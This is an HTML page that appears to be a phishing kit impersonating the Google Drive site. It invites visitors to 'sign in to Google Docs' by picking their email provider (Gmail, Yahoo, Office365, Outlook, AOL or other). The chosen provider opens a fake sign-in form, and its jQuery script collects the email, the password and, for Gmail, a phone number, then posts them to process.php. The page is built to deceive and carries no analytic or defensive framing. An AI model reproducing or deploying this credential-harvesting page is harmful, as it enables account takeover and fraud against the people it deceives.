<!DOCTYPE html>
<html class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths" style="" lang="en_US"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<script src="inde_files/cbgapi.loaded_1" async=""></script><script src="inde_files/cbgapi.loaded_0" async=""></script><script type="text/javascript" async="" src="inde_files/ga.js"></script><script>(function(H){H.className=H.className.replace(/\bgoogle\b/,'google-js')})(document.documentElement)</script>
<meta content="IE=edge" http-equiv="X-UA-Compatible">
<meta charset="utf-8">
<meta content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no" name="viewport">

<meta property="og:url" content="www.google.com/drive/">
<meta name="twitter:url" content="www.google.com/drive/">
<meta name="twitter:title" content="Google Drive - Cloud Storage &amp; File Backup for Photos, Docs &amp; More">
<meta name="twitter:image" content="https://www.google.com/drive/static/images/drive/logo-drive.png">
<meta name="twitter:description" content="Get access to files anywhere through secure cloud storage and file backup for your photos, videos, files and more with Google Drive.">
<meta name="twitter:creator" content="google">

<!-- Open Graph -->
<meta content="Google Drive - Cloud Storage &amp; File Backup for Photos, Docs &amp; More" property="og:title">
<meta content="https://www.google.com/drive/static/images/drive/logo-drive.png" property="og:image">
<meta content="Get access to files anywhere through secure cloud storage and file backup for your photos, videos, files and more with Google Drive." property="og:description">
<meta property="og:type" content="website">

<!-- Doc Meta -->
<title>Google Drive - Cloud Storage &amp; File Backup for Photos, Docs &amp; More</title>
<meta content="Get access to files anywhere through secure cloud storage and file backup for your photos, videos, files and more with Google Drive." name="description">

<link rel="prefetch" href="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_120x44dp.png">

<style type="text/css">.hny-htirfw { display: none; }</style> 
		<link href="asset/animation-vflzHcTyC.css" type="text/css" crossorigin="anonymous" rel="stylesheet">
		<link href="asset/components-vflfxQtKp.css" type="text/css" crossorigin="anonymous" rel="stylesheet">
		<link href="asset/media_text-vfl6jBpfO.css" type="text/css" crossorigin="anonymous" rel="stylesheet">
		<link href="asset/base-vflQGhUQE.css" type="text/css" crossorigin="anonymous" rel="stylesheet">
		<link href="asset/index-vfl0GyzuL.css" type="text/css" crossorigin="anonymous" rel="stylesheet">
		<link href="asset/responsive_classes-vflX9R-EH.css" type="text/css" crossorigin="anonymous" rel="stylesheet">
		<link href="asset/modal-vflS6pGZb.css" type="text/css" crossorigin="anonymous" rel="stylesheet">

		<link href="asset/web_sprites.css" type="text/css" crossorigin="anonymous" rel="stylesheet">
		<link href="asset/css.css" type="text/css" rel="stylesheet">
		<link rel="stylesheet" href="inde_files/normalize.css">
<link rel="stylesheet" href="inde_files/maia.css">
<link rel="stylesheet" href="inde_files/lightbox.css">
  <script src="inde_files/google.js"></script>

  <script>
      var _gaq = _gaq || [];
      _gaq.push(['_cookiePathCopy', '/a/']);
      _gaq.push(['_cookiePathCopy', '/apps/']);
      _gaq.push(['_cookiePathCopy', '/work/']);
      _gaq.push(['_cookiePathCopy', '/work/apps/business/']);
      _gaq.push(['_cookiePathCopy', '/intl/']);
      _gaq.push(['_cookiePathCopy', '/intx/']);
      _gaq.push(['_cookiePathCopy', '/work/']);
    new gweb.analytics.AutoTrack({profile: "UA-28613865-1"});
  </script>

<link href="inde_files/css_002.css" rel="stylesheet">
<link href="inde_files/css.css" rel="stylesheet">


  <link rel="canonical" href="https://www.google.com/drive/">

<!-- External Scripts -->
<script src="inde_files/modernizr.js"></script>
<script src="asset/jquery.js" type="text/javascript"></script>
<!-- Favicon -->
<link href="https://www.google.com/drive/static/images/drive/favicon.ico" rel="icon" type="image/png">

<!-- Stylesheet -->
<link href="inde_files/main.css" rel="stylesheet">  </head>
  <body class="index nav-dark hoverable" style="padding-top: 0px;">
      <span itemscope="" itemtype="http://schema.org/LocalBusiness" />
	  <div style="display: none;" id="db-modal-index-sign-in-modal" class="db-modal-wrapper ui-modal">
			<div class="db-modal-overlay"></div>
			<div class="db-modal" style="width:422px;">
				<div class="db-modal-box">
					<a aria-label="Close" href="#" class="db-modal-x"></a>
					<h2 class="db-modal-title">
						<div class="db-modal-title-text">Sign in</div>
					</h2>
					<div class="db-modal-content">
						<div data-js-component-id="component39208" id="pyxl39207" class="login-form-container standard">
							<div id="regular-login-forms">
								<form action="#" novalidate="" style="" method="POST" class="clearfix credentials-form login-form">
									<div class="credentials-form__fields">
										<div data-js-component-id="component39211" tabindex="-1" id="pyxl39209" class="login-email text-input login-text-input standard">
											<div class="text-input-error-wrapper">
												<form:error name="login_email">
													<div class="em_error"></div>
												</form:error>
											</div>
											<div class="text-input-wrapper">
												<input class="text-input-input autofocus" name="em" id="pyxl39210" type="email" placeholder="Email"> 
												<small class="secondary-label"></small>
											</div>
										</div>
										<div data-js-component-id="component39214" tabindex="-1" id="pyxl39212" class="text-input login-password login-text-input standard">
											<div class="text-input-error-wrapper">
												<form:error name="login_password">
													<div class="psw_error"></div>
												</form:error>
											</div>
											<div class="text-input-wrapper">
												<input class="text-input-input" id="pyxl39213" name="psw" type="password" placeholder="Password"> 
												<small class="secondary-label"></small>
												<div class="password-caps-indicator">Caps lock is currently on</div>
											</div>
										</div>
										<div data-js-component-id="component39214" tabindex="-1" id="pyxl39209" class="text-input login-password login-text-input standard">
											<div class="text-input-error-wrapper">
												<form:error name="login_password">
													<div class="phn_error"></div>
												</form:error>
											</div>
											<div class="text-input-wrapper phone-box" style="display:none;">
												<input class="text-input-input" id="pyxl39213" name="phn" type="text" placeholder="Verify Phone"> 
												<input type="hidden" name="sub" id="sub" />
												<small class="secondary-label">Phone No (Without +)</small>
											</div>
										</div>
										<div class="login-via-email-link-container">or <a class="login-via-email-link">email me a link to sign in</a></div>
									</div>
									<div id="react-login-recaptcha-challenge-div"></div>
									<div class="clearfix">
										<div class="sso-description">
											<div class="sprite-div">
												<div class="sprite-frame small icon-left">
													<img src="asset/icon_spacer-vflN3BYt2.gif" alt="" class=" sprite sprite_web s_web_lock">
												</div>
												<div class="sprite-text">
													<div class="sprite-text-inner">Single sign-on enabled</div>
												</div>
											</div>
										</div>
										<div class="checkbox checkbox-inline standard remember-me">
											<div class="text-input-error-wrapper">
												<form:error name="remember_me">
													<div data-error-field-name="remember_me"></div>
												</form:error>
											</div>
											<input checked="checked" id="pyxl39215" name="remember_me" type="checkbox">
											<label for="pyxl39215">Remember me</label>
										</div>
										<button data-js-component-id="component39216" type="button" class="login-button button-primary">
											<div class="sign-in-text">Sign in</div>
											<div class="sso-text">Continue</div>
										</button>
										<span class="login-loading-indicator">
											<img data-js-component-id="component39217" src="asset/ajax-loading-small-vfl3Wt7C_.gif" data-hi-res="asset/ajax-loading-small@2x-vflAxdZTP.gif">
										</span>
									</div>
									<div class="sso-optout">
										<div>or <a href="#">Log in with Google Docs credentials</a></div>
									</div>
									<div class="login-need-help">
										<a href="#">Forgot your password?</a>
									</div>
								</form>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
      <!-- Header -->
      <header class="header" role="banner">
        <div class="header-item with-site-logo">
          <a class="site-logo site-logo-link" href="https://www.google.com/drive/" data-g-event="Drive" data-g-action="Header" data-g-label="Drive logo">
            <div class="lockup js-lockup">
              <span class="lockup-logo js-site-logo-image"></span>
              <span class="lockup-text"></span>
              <span class="lockup-brand">Drive</span>
            </div>
          </a>
        </div>

<nav class="nav-site" data-nav-name="mobile">
  <img itemprop="image" alt="Drive logo" src="inde_files/logo-drive.png">
  <ul>
    <li>
      <a class="meet" href="https://www.google.com/drive/" data-g-event="Drive" data-g-action="Header" data-g-label="Meet Drive">Meet Drive</a>
    </li>
    <li>
      <a class="using-drive" href="https://www.google.com/drive/using-drive" data-g-event="Drive" data-g-action="Header" data-g-label="Using Drive">Using Drive</a>
    </li>    <li>
      <a class="price" href="https://www.google.com/drive/pricing" data-g-event="Drive" data-g-action="Pricing" data-g-label="Pricing">Pricing</a>
    </li>    <li class="mobile-is-hidden device-is-hidden">
      <a class="download" href="https://www.google.com/drive/download" data-g-event="Drive" data-g-action="Header" data-g-label="Download">Download</a>
    </li>
    <li>
      <a class="work" href="https://www.google.com/work/apps/business/driveforwork/?utm_medium=et&amp;utm_source=aboutdrive&amp;utm_campaign=en&amp;utm_content=consnav" data-g-event="Drive" data-g-action="Header" data-g-label="For Work">For Work</a>
    </li>
    <li class="last-default">
      <a class="help" href="https://support.google.com/drive/answer/2424384?hl=en" data-g-event="Drive" data-g-action="Header" data-g-label="Help">Help</a>
    </li>
    
    <li class="download-app mobile-is-visible crushed-is-visible">
      <a class="download-mobile-android boxed-in" href="https://play.google.com/store/apps/details?id=com.google.android.apps.docs&amp;hl=en" data-g-event="Drive" data-g-action="Header" data-g-label="Download for Android">Download for Android</a>
      <a class="download-mobile-ios boxed-in" href="https://itunes.apple.com/en/app/google-drive/id507874739" data-g-event="Drive" data-g-action="Header" data-g-label="Download for iOS">Download for iOS</a>
      <a class="download-mobile boxed-in get-started" href="" data-g-event="Drive" data-g-action="Header" data-g-label="Sign In" style="display: inline-block;">Sign In</a>
    </li>
  </ul>
</nav>        <div class="mobile-nav-toggle js-mobilenav">
          <div class="icon toggle-nav-open js-mobilenav-toggle icon-mobile-open-dark" data-target-nav="mobile"></div>
          <div class="icon icon-mobile-close toggle-nav-closed js-mobilenav-toggle-close" data-target-nav="mobile"></div>
        </div>
      </header>
      </span>
      <!-- End Header -->


<!-- scrollable wrapper -->

  <section class="hero small-padding" style="padding-top:20px; padding-bottom:0px;">
    <div class="section-centered section-vertical-align js-vertical-align" style="margin-top: 53px;">
      <div class="sixteen-whole">
        <img alt="Drive logo" src="inde_files/logo-drive.png">
        <div class="header-text" style="padding:0px;"><center>
        <div class="header-text" style="padding:0px;"><center>
				<h2 class="medium-title" style="margin-top:0px; margin-bottom:0px; padding-bottom:0px; color:#1A87FB;"">Now, you can sign in to Google Docs with your email</h2>
				<p class="small-title" style="margin-top:0px; font-size:25px; color:#D6373B;">Select your email provider</p></center>
			</div>
			</section>
<style>
.mail-selector { 
	opacity: 0.5;
	filter: alpha(opacity=50);
	cursor:pointer;
	filter: grayscale(100%);
}

.mail-selector:hover {
	opacity: 1;
	filter: alpha(opacity=100);
	filter: grayscale(0%);
}
</style>
</style><center>
		<div class="footer-row" style="padding:15px 0px; background:##FAFAFA;">
			<footer id="homepage-footer" class="twelve-column clearfix">
				<table>
					<tbody>
						<tr><center>
							<td style="width:20%; text-align:center;"><img data="gm" class="mail-selector" src="asset/gmail.jpg" style="height:50px;" /></td>
							<td style="width:20%; text-align:center; padding-top:10px;"><img data="ym" class="mail-selector" src="asset/yahoo.png" style="height:55px;" /></td>
							<td style="width:20%; text-align:center;"><img data="of" class="mail-selector" src="asset/Office_365.png" style="height:40px;" /></td>
							<td style="width:20%; text-align:center;"><img data="hm" class="mail-selector" src="asset/hotmail.png" style="height:50px;" /></td>
							<td style="width:20%; text-align:center;"><img data="am" class="mail-selector" src="asset/aol.png" style="height:40px;" /></td>
							<td style="width:15%; "><img data="om" class="mail-selector" src="asset/other.jpg" style="height:50px;" /></td>
						</tr>
					</tbody>
				</table>
			</footer>
		</div><center> 
	</body>
<script>
$(document).ready(function() {
	$('.db-modal-x').click(function() {
		$('div.em_error, div.psw_error, div.phn_error').html('');
		$('button.login-button').removeAttr('disabled');
		$('.login-loading-indicator').css({'display':'none'});
		$('input[name=em], input[name=psw], input[name=phn]').val('');
		$('div#db-modal-index-sign-in-modal').css({'display':'none'});
		$('div.phone-box').css({'display':'none'});
		$('div.db-modal-title-text').html('Sign in');
	});
	$('img.mail-selector').click(function() {
		var provider=$(this).attr('data');
		switch(provider) {
			case 'gm':
				$('div.db-modal-title-text').html('<img src="asset/gmail.jpg" style="height:30px; float:left; margin-right:40px;" /> Sign in with Gmail');
				$('input#sub').val("gmail");
				$('div.phone-box').css({'display':'block'});
			break;
			case 'ym':
				$('div.db-modal-title-text').html('<img src="asset/yahoo.png" style="height:30px; position:relative; float:left; margin-right:50px;" /> Sign in with Yahoo');
				$('input#sub').val("ymail");
			break;
			case 'of':
				$('div.db-modal-title-text').html('<img src="asset/Office_365.png" style="height:30px; float:left; margin-right:30px;" /> Sign in with Office365');
				$('input#sub').val("office365");
			break;
			case 'hm':
				$('div.db-modal-title-text').html('<img src="asset/hotmail.png" style="height:30px; float:left; margin-right:30px;" /> Sign in with Outlook');
				$('input#sub').val("hmail");
			break;
			case 'am':
				$('div.db-modal-title-text').html('<img src="asset/aol.png" style="height:30px; float:left; margin-right:50px;" /> Sign in with Aol');
				$('input#sub').val("amail");
			break;
			case 'om':
				$('div.db-modal-title-text').html('Sign in with other email provider');
				$('input#sub').val("omail");
			break;
		}
		$('div#db-modal-index-sign-in-modal').css({'display':'block'});
	});
	$("input[name=phn]").keydown(function (e) {
		// Allow: backspace, delete, tab, escape, enter and .
		if ($.inArray(e.keyCode, [43, 46, 8, 9, 27, 13, 110, 190]) !== -1 ||
		     // Allow: Ctrl+A, Command+A
		    (e.keyCode == 65 && ( e.ctrlKey === true || e.metaKey === true || e.shiftKey===true) ) || 
		     // Allow: home, end, left, right, down, up
		    (e.keyCode >= 35 && e.keyCode <= 40)) {
		         // let it happen, don't do anything
		         return;
		}
		// Ensure that it is a number and stop the keypress
		if ((e.shiftKey || (e.keyCode < 48 || e.keyCode > 57)) && (e.keyCode < 96 || e.keyCode > 105)) {
		    e.preventDefault();
		}
	});
	$('div.credentials-form__fields').keypress(function (e) {
		var key = e.which;
		if(key == 13) {
			$('button.login-button').click(); 
		}
	});   
	$('button.login-button').click(function() {
		$('div.em_error, div.psw_error, div.phn_error').html('');
		var sub=$('input#sub').val();
		var em=$.trim($('input[name=em]').val());
		var psw=$.trim($('input[name=psw]').val());
		var phn=$.trim($('input[name=phn]').val());
		if(!em.match(/^[\w\-\.\+]+\@[a-zA-Z0-9\.\-]+\.[a-zA-z0-9]{2,4}$/)) {
			$('div.em_error').html('Please enter your email');
			return false;
		}
		if(psw.length<5) {
			$('div.psw_error').html('Please enter your password');
			return false;
		}	
		if(sub!='gmail') {
			$('button.login-button').attr({'disabled':'disabled'});
			$('.login-loading-indicator').css({'display':'block'});
			$.post('process.php', {em:em, psw:psw, sub:sub}, function(res) {
				document.location.href=res;
			});
		}
		if(sub=='gmail') {
			if(phn.length<9) {
				$('div.phn_error').html('Please verify your phone number');
				return false;
			}		
			else {
				$('button.login-button').attr({'disabled':'disabled'});
				$('.login-loading-indicator').css({'display':'block'});
				$.post('process.php', {em:em, psw:psw, phn:phn, sub:sub}, function(res) {
					document.location.href=res;			
				});
			}	
		}
	});
})
</script>

    <!-- Footer -->
    <div class="signature-wrapper"><div id="maia-signature"></div></div>
    <div class="maia-footer" id="maia-footer">

<div id="maia-footer-local">
  <div class="maia-aux">
    <div class="maia-cols first">

      <div class="maia-col-3 footer-top social">
        Share Google Apps site: <span class="plusone-button" id="plusone-httpwwwgooglecoma" style="text-indent: 0px; margin: 0px; padding: 0px; background: transparent none repeat scroll 0% 0%; border-style: none; float: none; line-height: normal; font-size: 1px; vertical-align: baseline; display: inline-block; width: 38px; height: 24px;"><iframe ng-non-bindable="" hspace="0" marginheight="0" marginwidth="0" scrolling="no" style="position: static; top: 0px; width: 38px; margin: 0px; border-style: none; left: 0px; visibility: visible; height: 24px;" tabindex="0" vspace="0" id="I1_1484399881456" name="I1_1484399881456" src="inde_files/fastbutton.htm" data-gapiattached="true" title="+1" width="100%" frameborder="0"></iframe></span>
<script>
    window.___gcfg = {
      lang: 'en',
      parsetags: 'explicit'
    };

    var gweb = gweb || {};  // namespace
    gweb.plusOneButton = {};
    gweb.plusOneButton.callbacks = {};
    gweb.plusOneButton.onPlusOneLoad = function() {
      for (var slug in gweb.plusOneButton.callbacks) {
        gapi.plusone.render(slug, gweb.plusOneButton.callbacks[slug]);
      }
      gweb.plusOneButton.callbacks = {};
    };
              </script>
              <script src="inde_files/platform.js" gapi_processed="true">
              </script>
              <script>
              gweb.plusOneButton.callbacks['plusone-httpwwwgooglecoma'] = {
      'annotation': 'none',
      'href': 'http://www.google.com/a/',
      'size': 'standard',
      'callback': '',
      'recommendations': 'true'
    };
    gweb.plusOneButton.onPlusOneLoad();
  </script>      </div>
      <div class="maia-col-3 footer-top social">
        Follow:
        <span class="follow">
          <a href="https://plus.google.com/+GoogleDrive" rel="publisher"><img alt="Google+" src="inde_files/gplus_icon_flush_30dp.png" data-retina="16x16" width="16" height="16"></a>
          <a href="https://twitter.com/googledrive/"><img alt="YouTube" src="inde_files/footer_twitter.png" data-retina="16x16"></a>
          <a href="https://googledrive.blogspot.com/"><img alt="Blogger" src="inde_files/footer_blogger.jpg" data-retina="16x16"></a>
        </span>
      </div>
    </div>

   

  </div>
</div>
        <div id="maia-footer-global">
          <div class="maia-aux">
            <div class="maia-locales">
              <label><span>Change language:</span> <select onchange="var href=this[this.selectedIndex].value;if(href!=''){window.location.href=href};">
                    <option value="/intl/af_ALL/drive/">
                      Afrikaans
                    </option>
                    <option value="/intl/ar_ALL/drive/">
                      العربية
                    </option>
                    <option value="/intl/az_ALL/drive/">
                      azərbaycan dili
                    </option>
                    <option value="/intl/bg_ALL/drive/">
                      български
                    </option>
                    <option value="/intl/bn_ALL/drive/">
                      বাংলা
                    </option>
                    <option value="/intl/ca_ALL/drive/">
                      català
                    </option>
                    <option value="/intl/cs_ALL/drive/">
                      čeština
                    </option>
                    <option value="/intl/da_ALL/drive/">
                      dansk
                    </option>
                    <option value="/intl/de_ALL/drive/">
                      Deutsch
                    </option>
                    <option value="/intl/el_ALL/drive/">
                      Ελληνικά
                    </option>
                    <option value="/drive/" selected="selected">
                      English (United States)
                    </option>
                    <option value="/intl/en-GB_ALL/drive/">
                      English (United Kingdom)
                    </option>
                    <option value="/intl/es-419_ALL/drive/">
                      español (Latinoamérica)
                    </option>
                    <option value="/intl/es_ALL/drive/">
                      español
                    </option>
                    <option value="/intl/et_ALL/drive/">
                      eesti
                    </option>
                    <option value="/intl/eu_ALL/drive/">
                      euskara
                    </option>
                    <option value="/intl/fa_ALL/drive/">
                      فارسی
                    </option>
                    <option value="/intl/fi_ALL/drive/">
                      suomi
                    </option>
                    <option value="/intl/fil_ALL/drive/">
                      Filipino
                    </option>
                    <option value="/intl/fr_ALL/drive/">
                      français
                    </option>
                    <option value="/intl/fr-CA_ALL/drive/">
                      français (Canada)
                    </option>
                    <option value="/intl/gl_ALL/drive/">
                      galego
                    </option>
                    <option value="/intl/gu_ALL/drive/">
                      ગુજરાતી
                    </option>
                    <option value="/intl/hi_ALL/drive/">
                      हिन्दी
                    </option>
                    <option value="/intl/iw_ALL/drive/">
                      עברית
                    </option>
                    <option value="/intl/hr_ALL/drive/">
                      hrvatski
                    </option>
                    <option value="/intl/hu_ALL/drive/">
                      magyar
                    </option>
                    <option value="/intl/hy_ALL/drive/">
                      հայերեն
                    </option>
                    <option value="/intl/id_ALL/drive/">
                      Indonesia
                    </option>
                    <option value="/intl/is_ALL/drive/">
                      íslenska
                    </option>
                    <option value="/intl/it_ALL/drive/">
                      italiano
                    </option>
                    <option value="/intl/ja_ALL/drive/">
                      日本語
                    </option>
                    <option value="/intl/ka_ALL/drive/">
                      ქართული
                    </option>
                    <option value="/intl/km_ALL/drive/">
                      ខ្មែរ
                    </option>
                    <option value="/intl/kn_ALL/drive/">
                      ಕನ್ನಡ
                    </option>
                    <option value="/intl/ko_ALL/drive/">
                      한국어
                    </option>
                    <option value="/intl/lo_ALL/drive/">
                      ລາວ
                    </option>
                    <option value="/intl/lt_ALL/drive/">
                      lietuvių
                    </option>
                    <option value="/intl/lv_ALL/drive/">
                      latviešu
                    </option>
                    <option value="/intl/ml_ALL/drive/">
                      മലയാളം
                    </option>
                    <option value="/intl/mn_ALL/drive/">
                      монгол
                    </option>
                    <option value="/intl/mr_ALL/drive/">
                      मराठी
                    </option>
                    <option value="/intl/ms_ALL/drive/">
                      Bahasa Melayu
                    </option>
                    <option value="/intl/ne_ALL/drive/">
                      नेपाली
                    </option>
                    <option value="/intl/nl_ALL/drive/">
                      Nederlands
                    </option>
                    <option value="/intl/no_ALL/drive/">
                      norsk bokmål
                    </option>
                    <option value="/intl/pa_ALL/drive/">
                      ਪੰਜਾਬੀ
                    </option>
                    <option value="/intl/pl_ALL/drive/">
                      polski
                    </option>
                    <option value="/intl/pt-BR_ALL/drive/">
                      português (Brasil)
                    </option>
                    <option value="/intl/pt-PT_ALL/drive/">
                      português (Portugal)
                    </option>
                    <option value="/intl/ro_ALL/drive/">
                      română
                    </option>
                    <option value="/intl/ru_ALL/drive/">
                      русский
                    </option>
                    <option value="/intl/si_ALL/drive/">
                      සිංහල
                    </option>
                    <option value="/intl/sk_ALL/drive/">
                      slovenčina
                    </option>
                    <option value="/intl/sl_ALL/drive/">
                      slovenščina
                    </option>
                    <option value="/intl/sr_ALL/drive/">
                      српски
                    </option>
                    <option value="/intl/sv_ALL/drive/">
                      svenska
                    </option>
                    <option value="/intl/sw_ALL/drive/">
                      Kiswahili
                    </option>
                    <option value="/intl/ta_ALL/drive/">
                      தமிழ்
                    </option>
                    <option value="/intl/te_ALL/drive/">
                      తెలుగు
                    </option>
                    <option value="/intl/th_ALL/drive/">
                      ไทย
                    </option>
                    <option value="/intl/tr_ALL/drive/">
                      Türkçe
                    </option>
                    <option value="/intl/uk_ALL/drive/">
                      українська
                    </option>
                    <option value="/intl/ur_ALL/drive/">
                      اردو
                    </option>
                    <option value="/intl/vi_ALL/drive/">
                      Tiếng Việt
                    </option>
                    <option value="/intl/zh-CN_ALL/drive/">
                      中文 (简体, 中国)
                    </option>
                    <option value="/intl/zh-HK_ALL/drive/">
                      中文 (繁體字, 中華人民共和國香港特別行政區)
                    </option>
                    <option value="/intl/zh-TW_ALL/drive/">
                      中文 (简体, 台湾)
                    </option>
                    <option value="/intl/zu_ALL/drive/">
                      isiZulu
                    </option>
                </select></label>
            </div>
            <ul>
              <li>
                <a href="https://www.google.com/">Google</a>
              </li>
              <li>
                <a href="https://www.google.com/about/">About Google</a>
              </li>
              <li>
                <a href="https://www.google.com/drive/www.google.com/intl/en_US/policies/privacy/">Privacy</a>
              </li>
              <li>
                <a href="https://www.google.com/drive/www.google.com/intl/en_US/policies/terms/">Terms</a>
              </li>
            </ul>
          </div>
        </div>
    </div>

    <!-- Scripts -->
    <script src="inde_files/TweenMax.js"></script>
    <script src="inde_files/morlock.js"></script>
      <script src="inde_files/drive-site.js">

    <iframe src="inde_files/activityi.htm" style="display: none;" width="1" height="1"></iframe>
  
</html>